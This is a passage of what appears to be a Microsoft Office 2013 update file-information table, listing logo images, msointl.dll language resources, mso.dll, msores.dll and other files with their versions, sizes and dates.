3725| 14-Sep-22| 01:05 \nspdesignlogo.contrastwhite_scale80.png| spdesignlogo.contrast-white_scale-80.png| | 1298| 14-Sep-22| 01:05 \nspdesignlogo.scale100.png| spdesignlogo.scale-100.png| | 2163| 14-Sep-22| 01:05 \nspdesignlogo.scale140.png| spdesignlogo.scale-140.png| | 3058| 14-Sep-22| 01:05 \nspdesignlogo.scale180.png| spdesignlogo.scale-180.png| | 4614| 14-Sep-22| 01:05 \nspdesignlogo.scale80.png| spdesignlogo.scale-80.png| | 1745| 14-Sep-22| 01:05 \nspdesignlogosmall.contrastblack_scale100.png| spdesignlogosmall.contrast-black_scale-100.png| | 1008| 14-Sep-22| 01:05 \nspdesignlogosmall.contrastblack_scale140.png| spdesignlogosmall.contrast-black_scale-140.png| | 1278| 14-Sep-22| 01:05 \nspdesignlogosmall.contrastblack_scale180.png| spdesignlogosmall.contrast-black_scale-180.png| | 1990| 14-Sep-22| 01:05 \nspdesignlogosmall.contrastblack_scale80.png| spdesignlogosmall.contrast-black_scale-80.png| | 617| 14-Sep-22| 01:05 \nspdesignlogosmall.contrastwhite_scale100.png| spdesignlogosmall.contrast-white_scale-100.png| | 977| 14-Sep-22| 01:05 \nspdesignlogosmall.contrastwhite_scale140.png| spdesignlogosmall.contrast-white_scale-140.png| | 1193| 14-Sep-22| 01:05 \nspdesignlogosmall.contrastwhite_scale180.png| spdesignlogosmall.contrast-white_scale-180.png| | 1876| 14-Sep-22| 01:05 \nspdesignlogosmall.contrastwhite_scale80.png| spdesignlogosmall.contrast-white_scale-80.png| | 602| 14-Sep-22| 01:05 \nspdesignlogosmall.scale100.png| spdesignlogosmall.scale-100.png| | 1546| 14-Sep-22| 01:05 \nspdesignlogosmall.scale140.png| spdesignlogosmall.scale-140.png| | 1910| 14-Sep-22| 01:05 \nspdesignlogosmall.scale180.png| spdesignlogosmall.scale-180.png| | 2614| 14-Sep-22| 01:05 \nspdesignlogosmall.scale80.png| spdesignlogosmall.scale-80.png| | 1003| 14-Sep-22| 01:05 \nvisiologo.contrastblack_scale100.png| visiologo.contrast-black_scale-100.png| | 1804| 14-Sep-22| 01:05 \nvisiologo.contrastblack_scale140.png| visiologo.contrast-black_scale-140.png| | 3195| 14-Sep-22| 01:05 \nvisiologo.contrastblack_scale180.png| visiologo.contrast-black_scale-180.png| | 3478| 14-Sep-22| 01:05 \nvisiologo.contrastblack_scale80.png| visiologo.contrast-black_scale-80.png| | 1474| 14-Sep-22| 01:05 \nvisiologo.contrastwhite_scale100.png| visiologo.contrast-white_scale-100.png| | 1801| 14-Sep-22| 01:05 \nvisiologo.contrastwhite_scale140.png| visiologo.contrast-white_scale-140.png| | 3254| 14-Sep-22| 01:05 \nvisiologo.contrastwhite_scale180.png| visiologo.contrast-white_scale-180.png| | 3626| 14-Sep-22| 01:05 \nvisiologo.contrastwhite_scale80.png| visiologo.contrast-white_scale-80.png| | 1447| 14-Sep-22| 01:05 \nvisiologo.scale100.png| visiologo.scale-100.png| | 1872| 14-Sep-22| 01:05 \nvisiologo.scale140.png| visiologo.scale-140.png| | 3262| 14-Sep-22| 01:05 \nvisiologo.scale180.png| visiologo.scale-180.png| | 3403| 14-Sep-22| 01:05 \nvisiologo.scale80.png| visiologo.scale-80.png| | 1526| 14-Sep-22| 01:05 \nvisiologosmall.contrastblack_scale100.png| visiologosmall.contrast-black_scale-100.png| | 1196| 14-Sep-22| 01:05 \nvisiologosmall.contrastblack_scale140.png| visiologosmall.contrast-black_scale-140.png| | 1497| 14-Sep-22| 01:05 \nvisiologosmall.contrastblack_scale180.png| visiologosmall.contrast-black_scale-180.png| | 2675| 14-Sep-22| 01:05 \nvisiologosmall.contrastblack_scale80.png| visiologosmall.contrast-black_scale-80.png| | 848| 14-Sep-22| 01:05 \nvisiologosmall.contrastwhite_scale100.png| visiologosmall.contrast-white_scale-100.png| | 1165| 14-Sep-22| 01:05 \nvisiologosmall.contrastwhite_scale140.png| visiologosmall.contrast-white_scale-140.png| | 1453| 14-Sep-22| 01:05 \nvisiologosmall.contrastwhite_scale180.png| visiologosmall.contrast-white_scale-180.png| | 2618| 14-Sep-22| 01:05 \nvisiologosmall.contrastwhite_scale80.png| visiologosmall.contrast-white_scale-80.png| | 836| 14-Sep-22| 01:05 \nvisiologosmall.scale100.png| visiologosmall.scale-100.png| | 1285| 14-Sep-22| 01:05 \nvisiologosmall.scale140.png| visiologosmall.scale-140.png| | 1597| 14-Sep-22| 01:05 \nvisiologosmall.scale180.png| visiologosmall.scale-180.png| | 2722| 14-Sep-22| 01:05 \nvisiologosmall.scale80.png| visiologosmall.scale-80.png| | 960| 14-Sep-22| 01:05 \nwinprojlogo.contrastblack_scale100.png| winprojlogo.contrast-black_scale-100.png| | 1662| 14-Sep-22| 01:05 \nwinprojlogo.contrastblack_scale140.png| winprojlogo.contrast-black_scale-140.png| | 2705| 14-Sep-22| 01:05 \nwinprojlogo.contrastblack_scale180.png| winprojlogo.contrast-black_scale-180.png| | 3391| 14-Sep-22| 01:05 \nwinprojlogo.contrastblack_scale80.png| winprojlogo.contrast-black_scale-80.png| | 1393| 14-Sep-22| 01:05 \nwinprojlogo.contrastwhite_scale100.png| winprojlogo.contrast-white_scale-100.png| | 1698| 14-Sep-22| 01:05 \nwinprojlogo.contrastwhite_scale140.png| winprojlogo.contrast-white_scale-140.png| | 2737| 14-Sep-22| 01:05 \nwinprojlogo.contrastwhite_scale180.png| winprojlogo.contrast-white_scale-180.png| | 3396| 14-Sep-22| 01:05 \nwinprojlogo.contrastwhite_scale80.png| winprojlogo.contrast-white_scale-80.png| | 1392| 14-Sep-22| 01:05 \nwinprojlogo.scale100.png| winprojlogo.scale-100.png| | 1740| 14-Sep-22| 01:05 \nwinprojlogo.scale140.png| winprojlogo.scale-140.png| | 2642| 14-Sep-22| 01:05 \nwinprojlogo.scale180.png| winprojlogo.scale-180.png| | 3257| 14-Sep-22| 01:05 \nwinprojlogo.scale80.png| winprojlogo.scale-80.png| | 1514| 14-Sep-22| 01:05 \nwinprojlogosmall.contrastblack_scale100.png| winprojlogosmall.contrast-black_scale-100.png| | 1124| 14-Sep-22| 01:05 \nwinprojlogosmall.contrastblack_scale140.png| winprojlogosmall.contrast-black_scale-140.png| | 1430| 14-Sep-22| 01:05 \nwinprojlogosmall.contrastblack_scale180.png| winprojlogosmall.contrast-black_scale-180.png| | 2183| 14-Sep-22| 01:05 \nwinprojlogosmall.contrastblack_scale80.png| winprojlogosmall.contrast-black_scale-80.png| | 721| 14-Sep-22| 01:05 \nwinprojlogosmall.contrastwhite_scale100.png| winprojlogosmall.contrast-white_scale-100.png| | 1119| 14-Sep-22| 01:05 \nwinprojlogosmall.contrastwhite_scale140.png| winprojlogosmall.contrast-white_scale-140.png| | 1380| 14-Sep-22| 01:05 \nwinprojlogosmall.contrastwhite_scale180.png| winprojlogosmall.contrast-white_scale-180.png| | 2148| 14-Sep-22| 01:05 \nwinprojlogosmall.contrastwhite_scale80.png| winprojlogosmall.contrast-white_scale-80.png| | 711| 14-Sep-22| 01:05 \nwinprojlogosmall.scale100.png| winprojlogosmall.scale-100.png| | 1308| 14-Sep-22| 01:05 \nwinprojlogosmall.scale140.png| winprojlogosmall.scale-140.png| | 1461| 14-Sep-22| 01:05 \nwinprojlogosmall.scale180.png| winprojlogosmall.scale-180.png| | 2189| 14-Sep-22| 01:05 \nwinprojlogosmall.scale80.png| winprojlogosmall.scale-80.png| | 855| 14-Sep-22| 01:05 \nwinwordlogo.contrastblack_scale100.png| winwordlogo.contrast-black_scale-100.png| | 1668| 14-Sep-22| 01:05 \nwinwordlogo.contrastblack_scale140.png| winwordlogo.contrast-black_scale-140.png| | 1984| 14-Sep-22| 01:05 \nwinwordlogo.contrastblack_scale180.png| winwordlogo.contrast-black_scale-180.png| | 3061| 14-Sep-22| 01:05 \nwinwordlogo.contrastblack_scale80.png| winwordlogo.contrast-black_scale-80.png| | 1385| 14-Sep-22| 01:05 \nwinwordlogo.contrastwhite_scale100.png| winwordlogo.contrast-white_scale-100.png| | 1663| 14-Sep-22| 01:05 \nwinwordlogo.contrastwhite_scale140.png| winwordlogo.contrast-white_scale-140.png| | 1979| 14-Sep-22| 01:05 \nwinwordlogo.contrastwhite_scale180.png| winwordlogo.contrast-white_scale-180.png| | 3067| 14-Sep-22| 01:05 \nwinwordlogo.contrastwhite_scale80.png| winwordlogo.contrast-white_scale-80.png| | 1386| 14-Sep-22| 01:05 \nwinwordlogo.scale100.png| winwordlogo.scale-100.png| | 1784| 14-Sep-22| 01:05 \nwinwordlogo.scale140.png| winwordlogo.scale-140.png| | 2165| 14-Sep-22| 01:05 \nwinwordlogo.scale180.png| winwordlogo.scale-180.png| | 3187| 14-Sep-22| 01:05 \nwinwordlogo.scale80.png| winwordlogo.scale-80.png| | 1435| 14-Sep-22| 01:05 \nwinwordlogosmall.contrastblack_scale100.png| winwordlogosmall.contrast-black_scale-100.png| | 1152| 14-Sep-22| 01:05 \nwinwordlogosmall.contrastblack_scale140.png| winwordlogosmall.contrast-black_scale-140.png| | 1422| 14-Sep-22| 01:05 \nwinwordlogosmall.contrastblack_scale180.png| winwordlogosmall.contrast-black_scale-180.png| | 1619| 14-Sep-22| 01:05 \nwinwordlogosmall.contrastblack_scale80.png| winwordlogosmall.contrast-black_scale-80.png| | 845| 14-Sep-22| 01:05 \nwinwordlogosmall.contrastwhite_scale100.png| winwordlogosmall.contrast-white_scale-100.png| | 1156| 14-Sep-22| 01:05 \nwinwordlogosmall.contrastwhite_scale140.png| winwordlogosmall.contrast-white_scale-140.png| | 1409| 14-Sep-22| 01:05 \nwinwordlogosmall.contrastwhite_scale180.png| winwordlogosmall.contrast-white_scale-180.png| | 1605| 14-Sep-22| 01:05 \nwinwordlogosmall.contrastwhite_scale80.png| winwordlogosmall.contrast-white_scale-80.png| | 832| 14-Sep-22| 01:05 \nwinwordlogosmall.scale100.png| winwordlogosmall.scale-100.png| | 1219| 14-Sep-22| 01:05 \nwinwordlogosmall.scale140.png| winwordlogosmall.scale-140.png| | 1490| 14-Sep-22| 01:05 \nwinwordlogosmall.scale180.png| winwordlogosmall.scale-180.png| | 1706| 14-Sep-22| 01:05 \nwinwordlogosmall.scale80.png| winwordlogosmall.scale-80.png| | 881| 14-Sep-22| 01:05 \nresources.pri| resources.pri| | 47040| 14-Sep-22| 01:05 \nmso.tpn.txt.arm| mso_third_party_notices.txt| | 1814| 14-Sep-22| 01:05 \nmso.tpn.txt.x64| mso_third_party_notices.txt| | 1814| 14-Sep-22| 01:05 \nmso.tpn.txt.x86| mso_third_party_notices.txt| | 1814| 14-Sep-22| 01:05 \n \n#### \n\n__\n\nFor all supported x64-based versions of Office 2013\n\nFile identifier| File name| File version| File size| Date| Time \n---|---|---|---|---|--- \nfirstrun.exe| firstrun.exe| 15.0.5337.1000| 1044888| 14-Sep-22| 01:05 \nmsointl.dll.x64.1025| msointl.dll| 15.0.5493.1000| 4362672| 15-Sep-22| 09:18 \nmsointl.dll.x64.1026| msointl.dll| 15.0.5493.1000| 3262888| 15-Sep-22| 09:18 \nmsointl.dll.x64.1029| msointl.dll| 15.0.5493.1000| 3257776| 15-Sep-22| 09:18 \nmsointl.dll.x64.1030| msointl.dll| 15.0.5493.1000| 3007400| 15-Sep-22| 09:18 \nmsointl.dll.x64.1031| msointl.dll| 15.0.5493.1000| 3202984| 15-Sep-22| 09:18 \nmsointl.dll.x64.1032| msointl.dll| 15.0.5493.1000| 3625384| 15-Sep-22| 09:18 \nmsointl.dll.x64.3082| msointl.dll| 15.0.5493.1000| 3231664| 15-Sep-22| 09:18 \nmsointl.dll.x64.1061| msointl.dll| 15.0.5493.1000| 3020720| 15-Sep-22| 09:18 \nmsointl.dll.x64.1035| msointl.dll| 15.0.5493.1000| 3036072| 15-Sep-22| 09:18 \nmsointl.dll.x64.1036| msointl.dll| 15.0.5493.1000| 3890616| 15-Sep-22| 09:18 \nmsointl.dll.x64.1037| msointl.dll| 15.0.5493.1000| 4150704| 15-Sep-22| 09:18 \nmsointl.dll.x64.1081| msointl.dll| 15.0.5493.1000| 3112368| 15-Sep-22| 09:18 \nmsointl.dll.x64.1050| msointl.dll| 15.0.5493.1000| 3123624| 15-Sep-22| 09:18 \nmsointl.dll.x64.1038| msointl.dll| 15.0.5493.1000| 3314088| 15-Sep-22| 09:18 \nmsointl.dll.x64.1057| msointl.dll| 15.0.5493.1000| 2831784| 15-Sep-22| 09:18 \nmsointl.dll.x64.1040| msointl.dll| 15.0.5493.1000| 3150256| 15-Sep-22| 09:18 \nmsointl.dll.x64.1041| msointl.dll| 15.0.5493.1000| 3112896| 15-Sep-22| 09:18 \nmsointl.dll.x64.1087| msointl.dll| 15.0.5493.1000| 3307944| 15-Sep-22| 09:18 \nmsointl.dll.x64.1042| msointl.dll| 15.0.5493.1000| 3783592| 15-Sep-22| 09:18 \nmsointl.dll.x64.1063| msointl.dll| 15.0.5493.1000| 3264944| 15-Sep-22| 09:18 \nmsointl.dll.x64.1062| msointl.dll| 15.0.5493.1000| 3230640| 15-Sep-22| 09:18 \nmsointl.dll.x64.1086| msointl.dll| 15.0.5493.1000| 2850744| 15-Sep-22| 09:18 \nmsointl.dll.x64.1044| msointl.dll| 15.0.5493.1000| 2957232| 15-Sep-22| 09:18 \nmsointl.dll.x64.1043| msointl.dll| 15.0.5493.1000| 3118504| 15-Sep-22| 09:18 \nmsointl.dll.x64.1045| msointl.dll| 15.0.5493.1000| 3345320| 15-Sep-22| 09:18 \nmsointl.dll.x64.1046| msointl.dll| 15.0.5493.1000| 3150248| 15-Sep-22| 09:18 \nmsointl.dll.x64.2070| msointl.dll| 15.0.5493.1000| 3175336| 15-Sep-22| 09:18 \nmsointl.dll.x64.1048| msointl.dll| 15.0.5493.1000| 3290552| 15-Sep-22| 09:18 \nmsointl.dll.x64.1049| msointl.dll| 15.0.5493.1000| 3305384| 15-Sep-22| 09:18 \nmsointl.dll.x64.1051| msointl.dll| 15.0.5493.1000| 3304880| 15-Sep-22| 09:18 \nmsointl.dll.x64.1060| msointl.dll| 15.0.5493.1000| 3118512| 15-Sep-22| 09:18 \nmsointl.dll.x64.2074| msointl.dll| 15.0.5493.1000| 3160488| 15-Sep-22| 09:18 \nmsointl.dll.x64.1053| msointl.dll| 15.0.5493.1000| 3004840| 15-Sep-22| 09:18 \nmsointl.dll.x64.1054| msointl.dll| 15.0.5493.1000| 2952616| 15-Sep-22| 09:18 \nmsointl.dll.x64.1055| msointl.dll| 15.0.5493.1000| 3174832| 15-Sep-22| 09:18 \nmsointl.dll.x64.1058| msointl.dll| 15.0.5493.1000| 3285432| 15-Sep-22| 09:18 \nmsointl.dll.x64.1066| msointl.dll| 15.0.5493.1000| 3294632| 15-Sep-22| 09:18 \nmsointl.dll.x64.2052| msointl.dll| 15.0.5493.1000| 3129776| 15-Sep-22| 09:18 \nmsointl.dll.x64.1028| msointl.dll| 15.0.5493.1000| 3201960| 15-Sep-22| 09:18 \nmsointl.dll.x64.1033| msointl.dll| 15.0.5153.1000| 3844696| 14-Sep-22| 01:05 \nmso.dll.x64| mso.dll| 15.0.5493.1000| 37553600| 14-Sep-22| 01:05 \nxlsrv.ecs.mso.dll| mso.dll| 15.0.5493.1000| 37553600| 14-Sep-22| 01:05 \nconversion.office.msores.dll| msores.dll| 15.0.5241.1000| 135069792| 14-Sep-22| 01:05 \nmsores.dll| msores.dll| 15.0.5241.1000| 135069792| 14-Sep-22| 01:05 \nppt.conversion.msores.dll| msores.dll| 15.0.5241.1000| 135069792| 14-Sep-22| 01:05 \nppt.edit.msores.dll| msores.dll| 15.0.5241.1000| 135069792| 14-Sep-22| 01:05 \nwac.office.msores.dll| msores.dll| 15.0.5241.1000| 135069792| 14-Sep-22| 01:05 \noffice.dll| office.dll| 15.0.5493.1000| 460736| 14-Sep-22| 01:05 \nacmcompanion.mso.dll| mso.dll| 15.0.5493.1000| 26949048| | \nmso.dll.x86| mso.dll| 15.0.5493.1000| 26949048| 14-Sep-22| 01:05 \nmsores.dll| msores.dll| 15.0.5241.1000| 135069576| 14-Sep-22| 01:05 \nmsores.dll.x86| msores.dll| 15.0.5241.1000| 135069576| 14-Sep-22| 01:07 \nmsosqm.exe| msosqm.exe| 15.0.5455.1000| 662456| 14-Sep-22| 01:05 \nmsointl.dll.idx_dll.x64.1025| msointl.dll.idx_dll| 15.0.5455.1000| 55728| 15-Sep-22| 09:18 \nmsointl.rest.idx_dll.x64.1025| msointl.rest.idx_dll| 15.0.5455.1000| 1493936| 15-Sep-22| 09:18 \nmsointl.dll.idx_dll.x64.1026| msointl.dll.idx_dll| 15.0.5455.1000| 56752| 15-Sep-22| 09:18 \nmsointl.rest.idx_dll.x64.1026| msointl.rest.idx_dll| 15.0.5455.1000| 1497520| 15-Sep-22| 09:18 \nmsointl.dll.idx_dll.x64.1029| msointl.dll.idx_dll| 15.0.5455.1000| 56224| 15-Sep-22| 09:18 \nmsointl.rest.idx_dll.x64.1029| msointl.rest.idx_dll| 15.0.5455.1000| 1462688| 15-Sep-22| 09:18 \nmsointl.dll.idx_dll.x64.1030| msointl.dll.idx_dll| 15.0.5455.1000| 55736| 15-Sep-22| 09:18 \nmsointl.rest.idx_dll.x64.1030| msointl.rest.idx_dll| 15.0.5455.1000| 1458608| 15-Sep-22| 09:18 \nmsointl.dll.idx_dll.x64.1031| msointl.dll.idx_dll| 15.0.5455.1000| 56240| 15-Sep-22| 09:18 \nmsointl.rest.idx_dll.x64.1031| msointl.rest.idx_dll| 15.0.5455.1000| 1464760| 15-Sep-22| 09:18 \nmsointl.dll.idx_dll.x64.1032| msointl.dll.idx_dll| 15.0.5455.1000| 56232| 15-Sep-22| 09:18 \nmsointl.rest.idx_dll.x64.1032| msointl.rest.idx_dll| 15.0.5455.1000| 1470368| 15-Sep-22| 09:18 \nmsointl.dll.idx_dll.x64.1033| msointl.dll.idx_dll| 15.0.5455.1000| 56240| 14-Sep-22| 01:05 \nmsointl.rest.idx_dll.x64.1033| msointl.rest.idx_dll| 15.0.5455.1000| 1487792| 14-Sep-22| 01:05 \nmsointl.dll.idx_dll.x64.3082| msointl.dll.idx_dll| 15.0.5455.1000| 56248| 15-Sep-22| 09:18 \nmsointl.rest.idx_dll.x64.3082| msointl.rest.idx_dll| 15.0.5455.1000| 1473456| 15-Sep-22| 09:18 \nmsointl.dll.idx_dll.x64.1061| msointl.dll.idx_dll| 15.0.5455.1000| 56224| 15-Sep-22| 09:18 \nmsointl.rest.idx_dll.x64.1061| msointl.rest.idx_dll| 15.0.5455.1000| 1469344| 15-Sep-22| 09:18 \nmsointl.dll.idx_dll.x64.1035| msointl.dll.idx_dll| 15.0.5455.1000| 56248| 15-Sep-22| 09:18 \nmsointl.rest.idx_dll.x64.1035| msointl.rest.idx_dll| 15.0.5455.1000| 1459128| 15-Sep-22| 09:18 \nmsointl.dll.idx_dll.x64.1036| msointl.dll.idx_dll| 15.0.5455.1000| 56224| 15-Sep-22| 09:18 \nmsointl.rest.idx_dll.x64.1036| msointl.rest.idx_dll| 15.0.5455.1000| 1470880| 15-Sep-22| 09:18 \nmsointl.dll.idx_dll.x64.1037| msointl.dll.idx_dll| 15.0.5455.1000| 56240| 15-Sep-22| 09:18 \nmsointl.rest.idx_dll.x64.1037| msointl.rest.idx_dll| 15.0.5455.1000| 1478080| 15-Sep-22| 09:18 \nmsointl.dll.idx_dll.x64.1081| msointl.dll.idx_dll| 15.0.5455.1000| 55720| 15-Sep-22| 09:18 \nmsointl.rest.idx_dll.x64.1081| msointl.rest.idx_dll| 15.0.5455.1000| 1493408| 15-Sep-22| 09:18 \nmsointl.dll.idx_dll.x64.1050| msointl.dll.idx_dll| 15.0.5455.1000| 56736| 15-Sep-22| 09:18 \nmsointl.rest.idx_dll.x64.1050| msointl.rest.idx_dll| 15.0.5455.1000| 1502128| 15-Sep-22| 09:18 \nmsointl.dll.idx_dll.x64.1038| msointl.dll.idx_dll| 15.0.5455.1000| 56224| 15-Sep-22| 09:18 \nmsointl.rest.idx_dll.x64.1038| msointl.rest.idx_dll| 15.0.5455.1000| 1457056| 15-Sep-22| 09:18 \nmsointl.dll.idx_dll.x64.1057| msointl.dll.idx_dll| 15.0.5455.1000| 56232| 15-Sep-22| 09:18 \nmsointl.rest.idx_dll.x64.1057| msointl.rest.idx_dll| 15.0.5455.1000| 1487272| 15-Sep-22| 09:18 \nmsointl.dll.idx_dll.x64.1040| msointl.dll.idx_dll| 15.0.5455.1000| 55736| 15-Sep-22| 09:18 \nmsointl.rest.idx_dll.x64.1040| msointl.rest.idx_dll| 15.0.5455.1000| 1448376| 15-Sep-22| 09:18 \nmsointl.dll.idx_dll.x64.1041| msointl.dll.idx_dll| 15.0.5455.1000| 56256| 15-Sep-22| 09:18 \nmsointl.rest.idx_dll.x64.1041| msointl.rest.idx_dll| 15.0.5455.1000| 1480112| 15-Sep-22| 09:18 \nmsointl.dll.idx_dll.x64.1087| msointl.dll.idx_dll| 15.0.5455.1000| 55728| 15-Sep-22| 09:18 \nmsointl.rest.idx_dll.x64.1087| msointl.rest.idx_dll| 15.0.5455.1000| 1466800| 15-Sep-22| 09:18 \nmsointl.dll.idx_dll.x64.1042| msointl.dll.idx_dll| 15.0.5455.1000| 55200| 15-Sep-22| 09:18 \nmsointl.rest.idx_dll.x64.1042| msointl.rest.idx_dll| 15.0.5455.1000| 1430440| 15-Sep-22| 09:18 \nmsointl.dll.idx_dll.x64.1063| msointl.dll.idx_dll| 15.0.5455.1000| 56240| 15-Sep-22| 09:18 \nmsointl.rest.idx_dll.x64.1063| msointl.rest.idx_dll| 15.0.5455.1000| 1487800| 15-Sep-22| 09:18 \nmsointl.dll.idx_dll.x64.1062| msointl.dll.idx_dll| 15.0.5455.1000| 56744| 15-Sep-22| 09:18 \nmsointl.rest.idx_dll.x64.1062| msointl.rest.idx_dll| 15.0.5455.1000| 1489824| 15-Sep-22| 09:18 \nmsointl.dll.idx_dll.x64.1086| msointl.dll.idx_dll| 15.0.5455.1000| 55712| 15-Sep-22| 09:18 \nmsointl.rest.idx_dll.x64.1086| msointl.rest.idx_dll| 15.0.5455.1000| 1486760| 15-Sep-22| 09:18 \nmsointl.dll.idx_dll.x64.1044| msointl.dll.idx_dll| 15.0.5455.1000| 55744| 15-Sep-22| 09:18 \nmsointl.rest.idx_dll.x64.1044| msointl.rest.idx_dll| 15.0.5455.1000| 1455032| 15-Sep-22| 09:18 \nmsointl.dll.idx_dll.x64.1043| msointl.dll.idx_dll| 15.0.5455.1000| 55712| 15-Sep-22| 09:18 \nmsointl.rest.idx_dll.x64.1043| msointl.rest.idx_dll| 15.0.5455.1000| 1461152| 15-Sep-22| 09:18 \nmsointl.dll.idx_dll.x64.1045| msointl.dll.idx_dll| 15.0.5455.1000| 56224| 15-Sep-22| 09:18 \nmsointl.rest.idx_dll.x64.1045| msointl.rest.idx_dll| 15.0.5455.1000| 1477024| 15-Sep-22| 09:18 \nmsointl.dll.idx_dll.x64.1046| msointl.dll.idx_dll| 15.0.5455.1000| 56768| 15-Sep-22| 09:18 \nmsointl.rest.idx_dll.x64.1046| msointl.rest.idx_dll| 15.0.5455.1000| 1504176| 15-Sep-22| 09:18 \nmsointl.dll.idx_dll.x64.2070| msointl.dll.idx_dll| 15.0.5455.1000| 56224| 15-Sep-22| 09:18 \nmsointl.rest.idx_dll.x64.2070| msointl.rest.idx_dll| 15.0.5455.1000| 1508776| 15-Sep-22| 09:18 \nmsointl.dll.idx_dll.x64.1048| msointl.dll.idx_dll| 15.0.5455.1000| 56232| 15-Sep-22| 09:18 \nmsointl.rest.idx_dll.x64.1048| msointl.rest.idx_dll| 15.0.5455.1000| 1470888| 15-Sep-22| 09:18 \nmsointl.dll.idx_dll.x64.1049| msointl.dll.idx_dll| 15.0.5455.1000| 56248| 15-Sep-22| 09:18 \nmsointl.rest.idx_dll.x64.1049| msointl.rest.idx_dll| 15.0.5455.1000| 1463216| 15-Sep-22| 09:18 \nmsointl.dll.idx_dll.x64.1051| msointl.dll.idx_dll| 15.0.5455.1000| 56744| 15-Sep-22| 09:18 \nmsointl.rest.idx_dll.x64.1051| msointl.rest.idx_dll| 15.0.5455.1000| 1477048| 15-Sep-22| 09:18 \nmsointl.dll.idx_dll.x64.1060| msointl.dll.idx_dll| 15.0.5455.1000| 56232| 15-Sep-22| 09:18 \nmsointl.rest.idx_dll.x64.1060| msointl.rest.idx_dll| 15.0.5455.1000| 1478560| 15-Sep-22| 09:18 \nmsointl.dll.idx_dll.x64.2074| msointl.dll.idx_dll| 15.0.5455.1000| 56752| 15-Sep-22| 09:18 \nmsointl.rest.idx_dll.x64.2074| msointl.rest.idx_dll| 15.0.5455.1000| 1495472| 15-Sep-22| 09:18 \nmsointl.dll.idx_dll.x64.1053| msointl.dll.idx_dll| 15.0.5455.1000| 55720| 15-Sep-22| 09:18 \nmsointl.rest.idx_dll.x64.1053| msointl.rest.idx_dll| 15.0.5455.1000| 1456056| 15-Sep-22| 09:18 \nmsointl.dll.idx_dll.x64.1054| msointl.dll.idx_dll| 15.0.5455.1000| 55728| 15-Sep-22| 09:18 \nmsointl.rest.idx_dll.x64.1054| msointl.rest.idx_dll| 15.0.5455.1000| 1444272| 15-Sep-22| 09:18 \nmsointl.dll.idx_dll.x64.1055| msointl.dll.idx_dll| 15.0.5455.1000| 56224| 15-Sep-22| 09:18 \nmsointl.rest.idx_dll.x64.1055| msointl.rest.idx_dll| 15.0.5455.1000| 1478048| 15-Sep-22| 09:18 \nmsointl.dll.idx_dll.x64.1058| msointl.dll.idx_dll| 15.0.5455.1000| 56752| 15-Sep-22| 09:18 \nmsointl.rest.idx_dll.x64.1058| msointl.rest.idx_dll| 15.0.5455.1000| 1480112| 15-Sep-22| 09:18 \nmsointl.dll.idx_dll.x64.1066| msointl.dll.idx_dll| 15.0.5455.1000| 56240| 15-Sep-22| 09:18 \nmsointl.rest.idx_dll.x64.1066| msointl.rest.idx_dll| 15.0.5455.1000| 1519536| 15-Sep-22| 09:18 \nmsointl.dll.idx_dll.x64.2052| msointl.dll.idx_dll| 15.0.5455.1000| 55728| 15-Sep-22| 09:18 \nmsointl.rest.idx_dll.x64.2052| msointl.rest.idx_dll| 15.0.5455.1000| 1458608| 15-Sep-22| 09:18 \nmsointl.dll.idx_dll.x64.1028| msointl.dll.idx_dll| 15.0.5455.1000| 55200| 15-Sep-22| 09:18 \nmsointl.rest.idx_dll.x64.1028| msointl.rest.idx_dll| 15.0.5455.1000| 1442224| 15-Sep-22| 09:18 \nfirstrun.veman.xml| firstrun.visualelementsmanifest.xml| | 344| 14-Sep-22| 01:05 \nexcellogo.contrastblack_scale100.png| excellogo.contrast-black_scale-100.png| | 1657| 14-Sep-22| 01:05 \nexcellogo.contrastblack_scale140.png| excellogo.contrast-black_scale-140.png| | 2571| 14-Sep-22| 01:05 \nexcellogo.contrastblack_scale180.png| excellogo.contrast-black_scale-180.png| | 3253| 14-Sep-22| 01:05 \nexcellogo.contrastblack_scale80.png| excellogo.contrast-black_scale-80.png| | 1288| 14-Sep-22| 01:05 \nexcellogo.contrastwhite_scale100.png| excellogo.contrast-white_scale-100.png| | 1649| 14-Sep-22| 01:05 \nexcellogo.contrastwhite_scale140.png| excellogo.contrast-white_scale-140.png| | 2556| 14-Sep-22| 01:05 \nexcellogo.contrastwhite_scale180.png| excellogo.contrast-white_scale-180.png| | 3290| 14-Sep-22| 01:05 \nexcellogo.contrastwhite_scale80.png| excellogo.contrast-white_scale-80.png| | 1303| 14-Sep-22| 01:05 \nexcellogo.scale100.png| excellogo.scale-100.png| | 1706| 14-Sep-22| 01:05 \nexcellogo.scale140.png| excellogo.scale-140.png| | 2511| 14-Sep-22| 01:05 \nexcellogo.scale180.png| excellogo.scale-180.png| | 3120| 14-Sep-22| 01:05 \nexcellogo.scale80.png| excellogo.scale-80.png| | 1402| 14-Sep-22| 01:05 \nexcellogosmall.contrastblack_scale100.png| excellogosmall.contrast-black_scale-100.png| | 1085| 14-Sep-22| 01:05 \nexcellogosmall.contrastblack_scale140.png| excellogosmall.contrast-black_scale-140.png| | 1339| 14-Sep-22| 01:05 \nexcellogosmall.contrastblack_scale180.png| excellogosmall.contrast-black_scale-180.png| | 2028| 14-Sep-22| 01:05 \nexcellogosmall.contrastblack_scale80.png| excellogosmall.contrast-black_scale-80.png| | 811| 14-Sep-22| 01:05 \nexcellogosmall.contrastwhite_scale100.png| excellogosmall.contrast-white_scale-100.png| | 1053| 14-Sep-22| 01:05 \nexcellogosmall.contrastwhite_scale140.png| excellogosmall.contrast-white_scale-140.png| | 1315| 14-Sep-22| 01:05 \nexcellogosmall.contrastwhite_scale180.png| excellogosmall.contrast-white_scale-180.png| | 1927| 14-Sep-22| 01:05 \nexcellogosmall.contrastwhite_scale80.png| excellogosmall.contrast-white_scale-80.png| | 772| 14-Sep-22| 01:05 \nexcellogosmall.scale100.png| excellogosmall.scale-100.png| | 1208| 14-Sep-22| 01:05 \nexcellogosmall.scale140.png| excellogosmall.scale-140.png| | 1454| 14-Sep-22| 01:05 \nexcellogosmall.scale180.png| excellogosmall.scale-180.png| | 2015| 14-Sep-22| 01:05 \nexcellogosmall.scale80.png| excellogosmall.scale-80.png| | 886| 14-Sep-22| 01:05 \nfirstrunlogo.contrastblack_scale100.png| firstrunlogo.contrast-black_scale-100.png| | 1125| 14-Sep-22| 01:05 \nfirstrunlogo.contrastblack_scale140.png| firstrunlogo.contrast-black_scale-140.png| | 1689| 14-Sep-22| 01:05 \nfirstrunlogo.contrastblack_scale180.png| firstrunlogo.contrast-black_scale-180.png| | 2181| 14-Sep-22| 01:05 \nfirstrunlogo.contrastblack_scale80.png| firstrunlogo.contrast-black_scale-80.png| | 850| 